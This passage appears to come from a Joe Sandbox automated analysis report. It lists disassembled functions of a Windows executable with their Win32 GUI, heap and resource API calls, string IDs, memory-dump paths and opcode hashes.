                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                        • String ID:
                                        • API String ID: 1286715895-0
                                        • Opcode ID: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                        • Instruction ID: df21f5fe5c289298ab728cd37bb52f6d8c99b9184479e931f6e0fc541ff44454
                                        • Opcode Fuzzy Hash: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                        • Instruction Fuzzy Hash: 14415CB0900706EFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D945CB69
                                        Function 00405C70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Focus$ActiveChildClassNameParentWindowstrcmp
                                        • String ID: MDI_ChildClass
                                        • API String ID: 1701595447-1946758919
                                        • Opcode ID: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                        • Instruction ID: d253d9b16c365dcb60b46e847a60c04356fa5ff6473b175f6f9f07f47c3fcc33
                                        • Opcode Fuzzy Hash: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                        • Instruction Fuzzy Hash: 1C210C72D04719EBDF11AFA59D488AFBBB8FE44301B20843BE501B2290D7384E51DF5A
                                        Function 004056EF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 320windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                          • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                          • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                          • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                          • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                          • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                          • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                          • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                          • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                        • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                        • GetParent.USER32(?), ref: 00405746
                                        • GetClientRect.USER32(?,00000000), ref: 004058A2
                                        • FillRect.USER32(?,00000000,?), ref: 004058B2
                                        • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                        • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureClientFillInfoParametersParentPropState
                                        • String ID: PB_WindowID
                                        • API String ID: 2736716905-1508741625
                                        • Opcode ID: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                        • Instruction ID: 29e404874b04c4d69bc6432aaff022b43f6243613acb16a20f2353146ae1e986
                                        • Opcode Fuzzy Hash: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                        • Instruction Fuzzy Hash: FAB1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BF845B62D0D3399A91EF5D
                                        Function 0040384E Relevance: 10.5, APIs: 7, Instructions: 41threadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                        • GetCurrentThreadId.KERNEL32 ref: 00403866
                                        • IsWindowVisible.USER32(?), ref: 0040386D
                                        • IsWindowEnabled.USER32(?), ref: 00403878
                                        • GetForegroundWindow.USER32 ref: 00403882
                                        • EnableWindow.USER32(?,00000000), ref: 0040388F
                                          • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,?,00406649), ref: 004067E6
                                        • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                        • String ID:
                                        • API String ID: 2983394722-0
                                        • Opcode ID: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                        • Instruction ID: b1902f0b285d8ff1f38c9be8955405961f45d1445ca6c4829f96fecf42db4020
                                        • Opcode Fuzzy Hash: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                        • Instruction Fuzzy Hash: 06F0F9322047109BE321BF75AD88B2F7AF8EF45B61B14843AF541F3291DB38D851966E
                                        Function 004042DD Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowEnabled.USER32(00000133), ref: 004042FE
                                        • SetTextColor.GDI32(?,?), ref: 0040431E
                                        • GetSysColor.USER32(00000014), ref: 0040432C
                                        • SetBkColor.GDI32(?,00000000), ref: 00404334
                                        • GetSysColorBrush.USER32(00000014), ref: 00404338
                                        • SetBkColor.GDI32(?,?), ref: 0040434A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Color$BrushEnabledTextWindow
                                        • String ID:
                                        • API String ID: 3110319690-0
                                        • Opcode ID: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                        • Instruction ID: 3bac33a7e9d7aff12e56e7c95b9a227e0688ac08b885ac0313a6761ddb88b25f
                                        • Opcode Fuzzy Hash: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                        • Instruction Fuzzy Hash: F2012171200305AFD620AB69AC48957B3FCEB84331F045B3AFA65E32E1C774EC158A26
                                        Function 004047BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongA.USER32(000000FF,000000FC,00404714), ref: 004047F5
                                        • SetWindowLongA.USER32(000000FF,000000F4,000000FF), ref: 00404800
                                        • SetPropA.USER32(000000FF,PB_ID,000000FF), ref: 0040480B
                                        • SendMessageA.USER32(000000FF,00000030,000000FF,00000001), ref: 0040481C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LongWindow$MessagePropSend
                                        • String ID: PB_ID
                                        • API String ID: 499798845-4173770792
                                        • Opcode ID: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                        • Instruction ID: 95a633425f538de9a54c52fb3ff2f65ec4db39112d0deefb15a4c97684d4ca47
                                        • Opcode Fuzzy Hash: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                        • Instruction Fuzzy Hash: 900192B5500308BFCB119F55DD84E8A7BB8FB44760F20C626F925672D1C374D950CBA4
                                        Function 00406060 Relevance: 7.6, APIs: 5, Instructions: 100filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00A405B8,?,?,?,00A412E0,?,00406244,00000001,00000001), ref: 00406090
                                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,00A405B8,?,?,?,00A412E0,?,00406244,00000001,00000001), ref: 004060B2
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 00406116
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateFile$AllocateHeap
                                        • String ID:
                                        • API String ID: 2813278966-0
                                        • Opcode ID: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                        • Instruction ID: 22e7740ac045cd4ad30a1761b82f9b87c0991fe1563c31a0c7e75b116f9b4f37
                                        • Opcode Fuzzy Hash: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                        • Instruction Fuzzy Hash: 7321D67278031176E2309B28AC46F57B358A744B71F22873AF762BB2C0C7B5AC64479D
                                        Function 00405BB5 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$Focus$EnabledLongVisible
                                        • String ID:
                                        • API String ID: 1625685152-0
                                        • Opcode ID: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                        • Instruction ID: c6146cca50ef5e8f765ec7b6592dd4ff06736dc7ed718ebd510666ced0979e75
                                        • Opcode Fuzzy Hash: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                        • Instruction Fuzzy Hash: D0F049302087015FE7215F659D8876B72B8FF95755714843EF151F21D0C778D891DA1E
                                        Function 0040416A Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,?), ref: 00404195
                                        • GetSysColor.USER32(0000000F), ref: 004041A3
                                        • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                        • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                        • SetBkColor.GDI32(?,?), ref: 004041C1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Color$BrushText
                                        • String ID:
                                        • API String ID: 3324192670-0
                                        • Opcode ID: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                        • Instruction ID: d8e8ad06d9decbb24c27d3cc026bde09b1a35479a682271e2c605a4ee8a6c308
                                        • Opcode Fuzzy Hash: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                        • Instruction Fuzzy Hash: CDF044B1100304ABD220AB299C48967B3FCEBA4331F004B36FA75E32D1C774AC558A66
                                        Function 004043AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004043D8
                                        • CreateWindowExA.USER32(?,Edit,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404466
                                        • SetWindowLongA.USER32(00000000,000000FC,Function_00004358), ref: 0040448A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$CreateLongmemset
                                        • String ID: Edit
                                        • API String ID: 2917088559-554135844
                                        • Opcode ID: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                        • Instruction ID: 6d6bdd9e0c8eed947640fc1b11ecc7fcd9f2bd5d8b727347204d49e96c7c13b5
                                        • Opcode Fuzzy Hash: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                        • Instruction Fuzzy Hash: 7A217CB1500205ABDB215F12ED09F5B3FB5EB84325F10823EF960B62E1D77988249B9C
                                        Function 00403A79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                        • strcmp.MSVCRT ref: 00403AA3
                                        • memmove.MSVCRT(00000000,00000004,-00000004,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000,00000000), ref: 00403AB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                        • String ID: \\?\
                                        • API String ID: 1538048364-4282027825
                                        • Opcode ID: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                        • Instruction ID: b2d6bd18301c6a615e078c624f6e571f893afb971f9df6f800e3a030ac3227e0
                                        • Opcode Fuzzy Hash: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                        • Instruction Fuzzy Hash: 90F027B36053016AD31066769D89E9B6B9CDF94364F104437F500E2182E638A91083B9
                                        Function 004040E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                        • GetStockObject.GDI32(00000011), ref: 004040F2
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                          • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,?), ref: 00406441
                                        • memset.MSVCRT ref: 0040412E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap$CriticalInitializeObjectSectionStockmemset
                                        • String ID: 3Ro
                                        • API String ID: 681713604-1492261280
                                        • Opcode ID: a8a5b75b4186f5b19981e93ddefbcc3adfbe2300ea032735be8ca8f602144bb4
                                        • Instruction ID: 8b4459e147fa465f05f031457460f5437a22d41cf9d00d9cfe2b139fd080bdb1
                                        • Opcode Fuzzy Hash: a8a5b75b4186f5b19981e93ddefbcc3adfbe2300ea032735be8ca8f602144bb4
                                        • Instruction Fuzzy Hash: 63F036B1A50304BAD700ABA09D4BF8D3BA8E704708F50403AB301B61C2DBF95654979D
                                        Function 004020B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(0040139A,00000000,0000000A), ref: 004020CE
                                        • LoadResource.KERNEL32(?,00000000,00000000,00000000,0040139A,OPS,00000000,00000000), ref: 004020E6
                                        • SizeofResource.KERNEL32(?,00000000,?,00000000,00000000,00000000,0040139A,OPS,00000000,00000000), ref: 004020F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadSizeof
                                        • String ID: lB
                                        • API String ID: 507330600-3702596448
                                        • Opcode ID: edf130433116dfd7c93db7e85d3f1517815cee4d5f8ab569f922270cbb5b81ab
                                        • Instruction ID: 6d28ba78a0d218b081487b1e7dd037222f4673f4e98f5ffc71b2acd0128368f3
                                        • Opcode Fuzzy Hash: edf130433116dfd7c93db7e85d3f1517815cee4d5f8ab569f922270cbb5b81ab
                                        • Instruction Fuzzy Hash: C5F01730508301AFC705EF20CE45A1ABAE5FB98B05F008C3EB5886A1A0D3759D14EB4A
                                        Function 00404E09 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                        • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                        • CreateAcceleratorTableA.USER32(?,?,?), ref: 00404F13
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                        • String ID:
                                        • API String ID: 1846328917-0
                                        • Opcode ID: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                        • Instruction ID: bc9dcee14bbf4dd975b3e87a1cfaf1458909dabdc56a66c9757580d18e599811
                                        • Opcode Fuzzy Hash: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                        • Instruction Fuzzy Hash: E8319E70100702DBC724CF24CA45A6ABBF5FF94704F10C82DE96AAB6A0E375EA50DB48
                                        Function 00407650 Relevance: 6.1, APIs: 4, Instructions: 62memorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 00407665
                                        • RtlAllocateHeap.NTDLL(00A30000,00000001,-00000005), ref: 00407687
                                        • RtlReAllocateHeap.NTDLL(00A30000,00000001,?,-00000005), ref: 004076AA
                                        • HeapFree.KERNEL32(00A30000,00000001), ref: 004076E0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$Allocate$Freestrlen
                                        • String ID:
                                        • API String ID: 3543670626-0
                                        • Opcode ID: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                        • Instruction ID: 9a70041e5ee9e3aa3c8356125c7a9a49bf0f5e47ff7a9399fb27335f50f92b23
                                        • Opcode Fuzzy Hash: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                        • Instruction Fuzzy Hash: F0215EB4A00208EFCB00CF58C984FAA37B5EF88314F20C469F8059B395D776AE41DB99
                                        Function 00405C1A Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowEnabled.USER32(?), ref: 00405C24
                                        • IsWindowVisible.USER32(?), ref: 00405C2F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                        • SetFocus.USER32(?), ref: 00405C5A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
